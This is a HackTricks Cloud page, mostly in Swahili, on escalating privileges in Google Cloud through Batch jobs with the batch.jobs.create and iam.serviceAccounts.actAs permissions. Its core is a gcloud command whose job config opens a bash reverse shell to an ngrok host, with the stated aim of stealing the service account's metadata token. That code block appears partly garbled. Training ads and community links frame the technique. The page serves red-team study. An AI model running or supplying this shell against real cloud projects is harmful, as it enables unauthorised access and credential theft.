GCP - Batch Privesc

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

Angalia the subscription plans!

Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.

Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.

Batch

Taarifa za msingi:

GCP - Batch Enum

`batch.jobs.create`, `iam.serviceAccounts.actAs`

Inawezekana kuunda batch job, kupata reverse shell na kuchukua metadata token ya SA (compute SA kwa default).

Unda Batch job na reverse shell

```bash gcloud beta batch jobs submit job-lxo3b2ub --location us-east1 --config - <& /dev/tcp/8.tcp.ngrok.io/10396 0>&1'\n" } } ], "volumes": [] } } ], "allocationPolicy": { "instances": [ { "policy": { "provisioningModel": "STANDARD", "machineType": "e2-micro" } } ] }, "logsPolicy": { "destination": "CLOUD_LOGGING" } } EOD ```

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

Angalia the subscription plans!

Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.

Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.

HackTricks Cloud

GCP - Batch Privesc

Batch

batch.jobs.create, iam.serviceAccounts.actAs

`batch.jobs.create`, `iam.serviceAccounts.actAs`